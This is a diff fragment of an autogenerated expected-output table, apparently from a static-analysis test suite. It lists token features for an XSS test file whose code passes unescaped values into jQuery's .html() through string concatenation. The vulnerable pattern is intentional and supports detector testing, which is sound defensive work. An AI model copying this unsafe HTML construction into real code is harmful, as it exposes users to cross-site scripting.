contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:1:79:20 | module.exports.types | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:1:79:20 | module.exports.types | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:1:87:1 | module. ... }\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:1:87:1 | module. ... }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:1:87:1 | module. ... }\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:8:79:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:8:79:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:8:79:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:16:79:20 | types | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:16:79:20 | types | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:16:79:20 | types | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:79:23 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:79:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:79:23 | this | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:79:23 | this | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:79:23 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | 'arguments' object of anonymous function | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | 'arguments' object of anonymous function | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | exceptional return of anonymous function | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | exceptional return of anonymous function | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | functio ... }\\n} | assignedToPropName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | functio ... }\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | functio ... }\\n} | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | functio ... }\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | return of anonymous function | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | return of anonymous function | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:24:87:1 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:34:79:36 | val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:34:79:36 | val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:34:79:36 | val | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:34:79:36 | val | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:34:79:36 | val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:34:79:36 | val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:34:79:36 | val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:34:79:36 | val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:34:79:36 | val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:34:79:36 | val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:18 | typeof val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:18 | typeof val | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:18 | typeof val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:18 | typeof val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:18 | typeof val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | typeof ... string" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | typeof ... string" | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | typeof ... string" | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | typeof ... string" | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | typeof ... string" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | val | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | val | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:9:80:31 | val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:16:80:18 | val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:16:80:18 | val | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:16:80:18 | val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:16:80:18 | val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:16:80:18 | val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:24:80:31 | "string" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:24:80:31 | "string" | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:24:80:31 | "string" | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:24:80:31 | "string" | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:80:24:80:31 | "string" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:9 | $ | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:9 | $ | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:9 | $ | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:9 | $ | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:9 | $ | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:17 | $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:17 | $("#foo") | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:17 | $("#foo") | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:17 | $("#foo") | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:17 | $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:17 | exceptional return of $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:17 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:17 | exceptional return of $("#foo") | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:17 | exceptional return of $("#foo") | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:17 | exceptional return of $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:22 | $("#foo").html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:22 | $("#foo").html | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:22 | $("#foo").html | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:22 | $("#foo").html | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:22 | $("#foo").html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:50 | $("#foo ... span>") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:50 | $("#foo ... span>") | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:50 | $("#foo ... span>") | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:50 | $("#foo ... span>") | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:50 | $("#foo ... span>") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:50 | exceptional return of $("#foo ... span>") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:50 | exceptional return of $("#foo ... span>") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:50 | exceptional return of $("#foo ... span>") | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:50 | exceptional return of $("#foo ... span>") | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:9:81:50 | exceptional return of $("#foo ... span>") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:11:81:16 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:11:81:16 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:11:81:16 | "#foo" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23265,12 +153027,22 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:11:81:16 | "#foo" | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:11:81:16 | "#foo" | enclosingFunctionName | types | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:11:81:16 | "#foo" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:19:81:22 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:19:81:22 | html | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:19:81:22 | html | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:19:81:22 | html | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:19:81:22 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:24:81:31 | "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:24:81:31 | "" | contextSurroundingFunctionParameters | (val) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:24:81:31 | "" | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:24:81:31 | "" | enclosingFunctionName | types | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:24:81:31 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:24:81:31 | "" | stringConcatenatedWith | -endpoint- val + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:24:81:37 | "" + val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:24:81:37 | "" + val | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:24:81:37 | "" + val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:24:81:37 | "" + val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:24:81:37 | "" + val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:24:81:49 | " ... /span>" | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:24:81:49 | " ... /span>" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:24:81:49 | " ... /span>" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23290,6 +153062,66 @@ 